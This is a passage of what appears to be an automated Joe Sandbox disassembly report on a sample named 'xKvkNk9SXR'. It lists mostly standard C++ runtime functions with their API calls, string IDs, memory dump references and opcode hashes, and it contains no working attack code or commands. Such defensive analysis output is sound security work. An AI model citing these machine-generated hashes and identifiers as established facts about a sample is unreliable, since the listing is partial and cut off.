                                          • Opcode ID: e6ada88bee326dfb3d2f771625e50b2741d60bb97bb05e0877869dcbc034d58b
                                          • Instruction ID: 0c14cb6d64c0ebba2a72a142cc911239c545cf1fac902d77f05064ab01a93dcb
                                          • Opcode Fuzzy Hash: e6ada88bee326dfb3d2f771625e50b2741d60bb97bb05e0877869dcbc034d58b
                                          • Instruction Fuzzy Hash: 6E11A032D00228DBCF05EBA8DE42AEE77B5FF84720F240519E8116B291DF349E41C7A1
                                          Function 00A2B189 Relevance: 9.1, APIs: 6, Instructions: 54COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • __EH_prolog3.LIBCMT ref: 00A2B190
                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00A2B19A
                                            • Part of subcall function 009B2B00: std::_Lockit::_Lockit.LIBCPMT ref: 009B2B1D
                                            • Part of subcall function 009B2B00: std::_Lockit::~_Lockit.LIBCPMT ref: 009B2B39
                                          • collate.LIBCPMT ref: 00A2B1D4
                                          • std::_Facet_Register.LIBCPMT ref: 00A2B1EB
                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00A2B20B
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00A2B229
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowcollate
                                          • String ID:
                                          • API String ID: 2363045490-0
                                          • Opcode ID: 5451b5b61b2411169f27c7389edbb4deed31cf07e45f070ad0a2abd8ce97538c
                                          • Instruction ID: 6499d371afddbf9e828cdafed582f42186acb575cf4cadb7fd9607004fa868bd
                                          • Opcode Fuzzy Hash: 5451b5b61b2411169f27c7389edbb4deed31cf07e45f070ad0a2abd8ce97538c
                                          • Instruction Fuzzy Hash: CD11C6319102249BCF05EBA8D951BFE77B4FF94720F240519E4116B291DF34AE41C7A1
                                          Function 00A2B2D5 Relevance: 9.1, APIs: 6, Instructions: 54COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • __EH_prolog3.LIBCMT ref: 00A2B2DC
                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00A2B2E6
                                            • Part of subcall function 009B2B00: std::_Lockit::_Lockit.LIBCPMT ref: 009B2B1D
                                            • Part of subcall function 009B2B00: std::_Lockit::~_Lockit.LIBCPMT ref: 009B2B39
                                          • messages.LIBCPMT ref: 00A2B320
                                          • std::_Facet_Register.LIBCPMT ref: 00A2B337
                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00A2B357
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00A2B375
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmessages
                                          • String ID:
                                          • API String ID: 438560357-0
                                          • Opcode ID: 88d410efafbc9b8b55fecd13bea30ad0e97f6625473b23e7671b551477dba89c
                                          • Instruction ID: 29344c1ed732fb7da3bf28c20921f26be9489e0e48c942ea14fb01f48f4daeb9
                                          • Opcode Fuzzy Hash: 88d410efafbc9b8b55fecd13bea30ad0e97f6625473b23e7671b551477dba89c
                                          • Instruction Fuzzy Hash: 9C11C632D102249BCF05EBA8D945BFE7774BF84720F284519E4117B291CF349E05CBA1
                                          Function 00A2B22F Relevance: 9.1, APIs: 6, Instructions: 54COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • __EH_prolog3.LIBCMT ref: 00A2B236
                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00A2B240
                                            • Part of subcall function 009B2B00: std::_Lockit::_Lockit.LIBCPMT ref: 009B2B1D
                                            • Part of subcall function 009B2B00: std::_Lockit::~_Lockit.LIBCPMT ref: 009B2B39
                                          • ctype.LIBCPMT ref: 00A2B27A
                                          • std::_Facet_Register.LIBCPMT ref: 00A2B291
                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00A2B2B1
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00A2B2CF
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowctype
                                          • String ID:
                                          • API String ID: 1394824916-0
                                          • Opcode ID: 7c750ba131f9431a00b0dcfbe02afff8da922b39944b6b2032777d7eadcf770c
                                          • Instruction ID: 5989565e3cdf8d2bfa1e77b77a228d4fc6301c33070f756472ed356ee6996948
                                          • Opcode Fuzzy Hash: 7c750ba131f9431a00b0dcfbe02afff8da922b39944b6b2032777d7eadcf770c
                                          • Instruction Fuzzy Hash: 0E11A331D00228DBCF05FBA8DA42BEE77B5AF84720F240519E8116B291CF749E41C7A1
                                          Function 00A7437A Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • GetLastError.KERNEL32(000000FF,00000000,00A613F8,00000000,00000000,?,00A618DE,00000000,00000000,009EBDFF,?,000000FF), ref: 00A7437E
                                          • _free.LIBCMT ref: 00A743B1
                                          • _free.LIBCMT ref: 00A743D9
                                          • SetLastError.KERNEL32(00000000,00000000,009EBDFF,?,000000FF), ref: 00A743E6
                                          • SetLastError.KERNEL32(00000000,00000000,009EBDFF,?,000000FF), ref: 00A743F2
                                          • _abort.LIBCMT ref: 00A743F8
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: ErrorLast$_free$_abort
                                          • String ID:
                                          • API String ID: 3160817290-0
                                          • Opcode ID: 3bb1cbd6cef25946b58d4f6afe185f6e37ac40a2f7e72ebefbacded874dcace2
                                          • Instruction ID: 843f5db9f5d3b5e784ec2273a3df6a369bb5cfceaf69b02f615bddc974223e0b
                                          • Opcode Fuzzy Hash: 3bb1cbd6cef25946b58d4f6afe185f6e37ac40a2f7e72ebefbacded874dcace2
                                          • Instruction Fuzzy Hash: 3AF0CD3B10454167DE22B3F57D09F1B157A9FCA7B1B21C116F41CDA292FF2489025121
                                          Function 00A12A00 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 110COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00A10CD0: ___std_type_info_name.LIBVCRUNTIME ref: 00A10D8E
                                            • Part of subcall function 00A10CD0: ___std_type_info_name.LIBVCRUNTIME ref: 00A10DF9
                                          • ___std_type_info_name.LIBVCRUNTIME ref: 00A12A51
                                            • Part of subcall function 00A57BC4: ___unDName.LIBVCRUNTIME ref: 00A57BF0
                                          • ___std_type_info_name.LIBVCRUNTIME ref: 00A12AB7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: ___std_type_info_name$Name___un
                                          • String ID: Modulus$PublicExponent$ThisObject:
                                          • API String ID: 3683324773-1616987064
                                          • Opcode ID: 45354314888e9c05e5494d87dcb5eb4677f10dc71938335f2fe17d442adc82f1
                                          • Instruction ID: f2e16feef5c8ed4bb1d88877539228d251563d91dea8214e7f398a8241eb6066
                                          • Opcode Fuzzy Hash: 45354314888e9c05e5494d87dcb5eb4677f10dc71938335f2fe17d442adc82f1
                                          • Instruction Fuzzy Hash: 5F4116306083416EC7229F34CC12FABBBE5BF95344F044A58F48567392EB72E999C796
                                          Function 009EB050 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86COMMON
                                          Download Yara Rule
                                          APIs
                                          • std::locale::_Locimp::_New_Locimp.LIBCPMT ref: 009EB06D
                                            • Part of subcall function 00A28B5B: __EH_prolog3.LIBCMT ref: 00A28B62
                                            • Part of subcall function 00A28B5B: std::locale::_Locimp::_Locimp.LIBCPMT ref: 00A28B80
                                          • std::_Lockit::_Lockit.LIBCPMT ref: 009EB08D
                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 009EB0AE
                                          • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 009EB0BE
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: Locimp::_std::locale::_$LocimpLockitstd::_$AddfacH_prolog3Locimp_Lockit::_Lockit::~_New_
                                          • String ID: w#G!
                                          • API String ID: 2312398356-519468572
                                          • Opcode ID: b19e71908fc6ce314b31cc7deb08d0cfc1ddf5328aca8ccecde0d7121d860123
                                          • Instruction ID: 7a1ed45f957d3be82ce3573bf9afaad5aa31b820a7181ba5719f4ed80b82013a
                                          • Opcode Fuzzy Hash: b19e71908fc6ce314b31cc7deb08d0cfc1ddf5328aca8ccecde0d7121d860123
                                          • Instruction Fuzzy Hash: 1521B1B1A01604AFC711EF69ED82BABB7A8FB55311F004176E81697241EB34ED1ACBD1
                                          Function 00A40050 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 82COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00A3FCB0: WaitForSingleObjectEx.KERNEL32(00000000,000000FF,00000000,?,21472377,w#G!,?,?,?,00000000,00000000,21472377,21472377), ref: 00A3FCF5
                                          • ReleaseSemaphore.KERNEL32(?,?,00000000,21472377,?,21472377,21472377,?,00A8BF00,000000FF,?,00A3FD89), ref: 00A400A0
                                          • ReleaseSemaphore.KERNEL32(?,?,00000000,?,00A3FD89), ref: 00A400C1
                                          • CloseHandle.KERNEL32(?,?,21472377,21472377), ref: 00A400F2
                                          • SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00A90140,000000FF), ref: 00A4012C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: ReleaseSemaphore$CloseEventHandleObjectSingleWait
                                          • String ID: w#G!
                                          • API String ID: 568734227-519468572
                                          • Opcode ID: 8de948737ddb2b5d12dea9e088dedc941cb3b6172fbecab036d928a579aa2565
                                          • Instruction ID: 9b2b5c408e28479e5371275b9cb2865ef7401608f6eb8e1d67972d8cca3f7761
                                          • Opcode Fuzzy Hash: 8de948737ddb2b5d12dea9e088dedc941cb3b6172fbecab036d928a579aa2565
                                          • Instruction Fuzzy Hash: 9D31CE35A40204AFDF20DF69C884F56B7B8EB84314F1445A9ED18DB296DB35DC01DBA0
                                          Function 009E61A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 73COMMON
                                          Download Yara Rule
                                          APIs
                                          • std::_Lockit::_Lockit.LIBCPMT ref: 009E61FA
                                          • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 009E6242
                                          • __Getcvt.LIBCPMT ref: 009E624B
                                            • Part of subcall function 009B2A30: std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 009B2A56
                                            • Part of subcall function 009B2A30: std::_Lockit::~_Lockit.LIBCPMT ref: 009B2AEA
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: std::_$Locinfo::_Lockit$GetcvtLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
                                          • String ID: w#G!$w#G!
                                          • API String ID: 1677860746-1134387879
                                          • Opcode ID: 438bdf621c508683b9341db2566a969801afbc031ec7fa5ea12cb9f443af5e59
                                          • Instruction ID: f68d13db133cc133ab9fc3b56a7ad15f65b0584e17edf335d17ef4a5cc0aa8b9
                                          • Opcode Fuzzy Hash: 438bdf621c508683b9341db2566a969801afbc031ec7fa5ea12cb9f443af5e59
                                          • Instruction Fuzzy Hash: 7F315A71C04748DEDB10DFA8CA41BDEBBF4FF19700F10466AE455A7282EBB46644CB95
                                          Function 00A27020 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 57COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: Getcvt$H_prolog3_
                                          • String ID: false$true
                                          • API String ID: 4085572910-2658103896
                                          • Opcode ID: 66b3adafdda52085bad1f04e3b7f9ea2606786f2ecda86aa2211e4a280596ef2
                                          • Instruction ID: 6c3329f3832c82a6788bc42d722ae2bf8d0354a0d5cef73571c663c80b3b3727
                                          • Opcode Fuzzy Hash: 66b3adafdda52085bad1f04e3b7f9ea2606786f2ecda86aa2211e4a280596ef2
                                          • Instruction Fuzzy Hash: CE119075E04741AFC724EFB8E441B9AB7F4AF09700F04892AE1A68B741EB70E5088B61
                                          Function 00A40750 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON
                                          Download Yara Rule
                                          APIs
                                          • EnterCriticalSection.KERNEL32(00AD87E8,?,?,00A148EF,00AD7168,00A91FF0,00000001), ref: 00A4075A
                                          • LeaveCriticalSection.KERNEL32(00AD87E8,?,00A148EF,00AD7168,00A91FF0,00000001), ref: 00A4078D
                                          • SetEvent.KERNEL32(00000000,00AD7168,00A91FF0,00000001), ref: 00A4081B
                                          • ResetEvent.KERNEL32 ref: 00A40827
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: CriticalEventSection$EnterLeaveReset
                                          • String ID: w#G!
                                          • API String ID: 3553466030-519468572
                                          • Opcode ID: 379b39d66a5277a4552426732f6a2ef63333c366764374f4e3838eb097d2979a
                                          • Instruction ID: 8a09cf59e0b5d5c955452379fb19b16ff1aadbbf8ffbba06cbc0f8d1402c2999
                                          • Opcode Fuzzy Hash: 379b39d66a5277a4552426732f6a2ef63333c366764374f4e3838eb097d2979a
                                          • Instruction Fuzzy Hash: 0901283AA01620EFCF04DFA9ED58D9977B9EB49741755412BE90297320CF386D06EB80
                                          Function 00A4E210 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35threadCOMMON
                                          Download Yara Rule
                                          APIs
                                          • Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 00A4E224
                                          • Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 00A4E248
                                          • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00A4E25B
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00A4E269
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: Resource$Concurrency::details::Execution$CurrentException@8Manager::Proxy::RemoveSchedulerThreadThrowstd::invalid_argument::invalid_argument
                                          • String ID: pScheduler
                                          • API String ID: 3657713681-923244539
                                          • Opcode ID: e18dd4a875dba67465f1ade652af5eee6fdcee6a0add780a9395b5722a2f847f
                                          • Instruction ID: 035a7803f65bbea5498463b60ad14ac21991c0ae654ef7fe6d6610445363f1b6
                                          • Opcode Fuzzy Hash: e18dd4a875dba67465f1ade652af5eee6fdcee6a0add780a9395b5722a2f847f
                                          • Instruction Fuzzy Hash: C5F0B439A00604A7CF14EBA5E942DEEB37DBED0720710496DE50527181DBB0AD06C7A1
                                          Function 00A4C2A0 Relevance: 7.6, APIs: 5, Instructions: 88COMMON
                                          Download Yara Rule
                                          APIs
                                          • _SpinWait.LIBCONCRT ref: 00A4C2C5
                                            • Part of subcall function 00A42302: _SpinWait.LIBCONCRT ref: 00A4231A
                                          • Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 00A4C2D9
                                          • Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 00A4C30B
                                          • List.LIBCMT ref: 00A4C38E
                                          • List.LIBCMT ref: 00A4C39D
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
                                          • String ID:
                                          • API String ID: 3281396844-0
                                          • Opcode ID: 88e4f74d5dcc12c3999f4d6282b44c54131d82064ed31bb9c0ec108fc6130dfd
                                          • Instruction ID: 3d899286a7de1c81883c7e1411ddabe2122b6680e69a6eaacb47a51430734b17
                                          • Opcode Fuzzy Hash: 88e4f74d5dcc12c3999f4d6282b44c54131d82064ed31bb9c0ec108fc6130dfd
                                          • Instruction Fuzzy Hash: EF31693A902615DFCB54EFA4D6416EDF7B0BF84324F44406AE80A7B242DB717E04CBA0
                                          Function 00A54BB5 Relevance: 7.6, APIs: 5, Instructions: 80threadCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SetEvent.KERNEL32(?,00000000,?), ref: 00A54C06
                                          • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00A54BEE
                                            • Part of subcall function 00A4CB06: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 00A4CB27
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00A54C37
                                          • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00A54C69
                                          • SwitchToThread.KERNEL32(00000005,00000004,00000000,?,?,?,?,?,?,?,00ACC368), ref: 00A54C6E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: Context$Event$Base::Concurrency::details::$ThrowTrace$Exception@8SwitchThread
                                          • String ID:
                                          • API String ID: 2412095092-0
                                          • Opcode ID: 31449a2186606205910de9bb0a13b8bd3fbce0b0c0d820413ebe225527073de8
                                          • Instruction ID: 7be7f880415c91bba1c68116a55a600a4d73be56cdd24f0f2d52da9fbcce4ddb
                                          • Opcode Fuzzy Hash: 31449a2186606205910de9bb0a13b8bd3fbce0b0c0d820413ebe225527073de8
                                          • Instruction Fuzzy Hash: C6210475701214AFCB00EB98DC45E6EB7FCFB88735B004056FE15A7291CF70AD418AA5
                                          Function 00A7C5A4 Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetEnvironmentStringsW.KERNEL32(00000000,?,00000002,?,?,00A821E5,00000000,?,00000000,00000000), ref: 00A7C5AD
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00A821E5,00000000,?,00000000,00000000), ref: 00A7C5D0
                                            • Part of subcall function 00A75B94: RtlAllocateHeap.NTDLL(00000000,?,?,?,00A57B27,?,?,?,?,?,009B1F07,?,?,?), ref: 00A75BC6
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00A821E5,00000000,?,00000000,00000000), ref: 00A7C5F6
                                          • _free.LIBCMT ref: 00A7C609
